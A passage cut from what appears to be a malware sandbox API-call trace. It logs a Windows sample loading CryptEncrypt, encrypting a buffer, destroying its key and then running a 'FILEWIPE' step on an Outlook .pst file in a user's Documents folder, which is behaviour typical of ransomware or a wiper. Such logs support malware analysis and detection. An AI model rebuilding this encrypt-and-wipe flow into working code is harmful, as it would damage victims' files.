hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd) returned 0x88ce98 [0036.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x88ce98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.747] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.747] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x42400, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x42410) returned 1 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.748] CharLowerBuffW (in: lpsz="byte[271377]", cchLength=0xc | out: lpsz="byte[271377]") returned 0xc [0036.748] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.755] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.755] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.759] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9d9828*, pdwDataLen=0x6ae220*=0x42400, dwBufLen=0x42410 | out: pbData=0x9d9828*, pdwDataLen=0x6ae220*=0x42410) returned 1 [0036.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.762] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.766] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.766] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.767] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.767] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.767] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.767] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.767] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.777] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.777] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.777] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.781] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.781] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.781] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.781] CryptDestroyKey (hKey=0x7c2200) returned 1 [0036.782] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.782] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.782] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.782] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.782] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.782] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.782] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.783] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.783] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.783] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.783] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.783] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.783] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.783] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.783] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.783] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.783] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.783] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.783] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0036.783] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.783] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.783] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.783] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.783] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.783] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.783] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.786] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.786] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.786] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.786] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.786] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.787] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x777648, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x7c2100 [0036.787] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.787] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.787] CharLowerBuffW (in: lpsz="byte[271360]", cchLength=0xc | out: lpsz="byte[271360]") returned 0xc [0036.789] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.789] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.789] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.789] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.789] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.790] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.790] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.790] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, 